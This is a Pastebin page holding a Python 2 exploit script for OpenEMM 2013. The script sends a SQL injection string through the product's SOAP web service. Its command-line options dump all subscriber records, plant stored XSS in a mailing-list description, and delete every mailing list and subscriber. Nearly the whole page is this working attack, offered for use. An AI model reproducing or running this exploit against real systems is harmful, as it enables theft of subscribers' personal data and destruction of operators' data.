Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import os
- import sys
- from SOAPpy import WSDL
- from argparse import ArgumentParser
- from re import sub
- # Exploit Title: OpenEMM 2013 SQL Injection / Stored XSS
- # Date: 07/20/2013
- # Exploit Author: drone (@dronesec)
- # Vendor Homepage: http://www.openemm.org/
- # Software Link: https://downloads.sourceforge.net/project/openemm/OpenEMM%20software/OpenEMM%202013/OpenEMM-2013-bin.tar.gz
- # Version: 2013 (8.10.380.hf13.0.066)
- # Tested on: Ubuntu 12.04
- """ Exploits a host of vulnerabilities discovered in OpenEMM.
- Required ws.wsdl file should be in local directory.
- """
- def run(options):
- """ run exploit
- """
- wsdl_file = "./ws.wsdl"
- sploit = "\\' OR 1=1;-- "
- _server = WSDL.Proxy(wsdl_file)
- if options.subscribers:
- # iterate until we get a null response
- idx = 1
- while True:
- ret = _server.getSubscriber("wsadmin", sploit, idx)
- if ret.paramValues == '':
- print '[!] Discovered %d subscribers'%(idx-1)
- break
- print ret.paramValues
- idx += 1
- elif options.mlist:
- try:
- print '[!] Description field vulnerable to stored xss!'
- description = raw_input('[!] Enter mlist description: ')
- except:
- description = ''
- ret = _server.addMailinglist('wsadmin', sploit, options.mlist, description)
- if ret > 0: print '[!] Saved successfully'
- else: print '[!] Save unsuccessful'
- elif options.dmlist:
- print '[!] Deleting all mailing lists...'
- idx = 1
- while True:
- ret = _server.deleteMailinglist('wsadmin', sploit, idx)
- if ret == 0:
- print '[!] Deleted %d mailing lists.'%idx
- break
- idx += 1
- elif options.dsubs:
- print '[!] Deleting all subscribers...'
- idx = 1
- while True:
- ret = _server.deleteSubscriber('wsadmin', sploit, idx)
- if ret == 0:
- print '[!] Deleted %d subscribers.'%idx
- break
- idx += 1
- def parse_args():
- """ parse args and sub in the desired IP
- """
- parser = ArgumentParser()
- parser.add_argument('-i', help='server address', action='store',
- dest='host', required=True)
- parser.add_argument('-s', help='fetch all subscribers', action='store_true',
- dest='subscribers')
- parser.add_argument('-m', help='create new mailing list (XSS)', action='store',
- dest='mlist')
- parser.add_argument('--dm', help='delete all mailing lists', action='store_true',
- dest='dmlist')
- parser.add_argument('--ds', help='delete all subscribers', action='store_true',
- dest='dsubs')
- options = parser.parse_args()
- try:
- # sub in server address
- with open('ws.wsdl', 'r') as f:
- out = open('tmp.wsdl', 'w+')
- for line in f:
- line = sub('location="(.*?)"',
- 'location="http://{0}:8080/emm_webservice"'.format(options.host),
- line)
- out.write(line)
- out.close()
- except IOError:
- print '[-] ws.wsdl not found'
- sys.exit(1)
- # replace ws.wsdl with temp one
- os.system('mv tmp.wsdl ws.wsdl')
- return options
- if __name__ == "__main__":
- options = parse_args()
- run(options)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement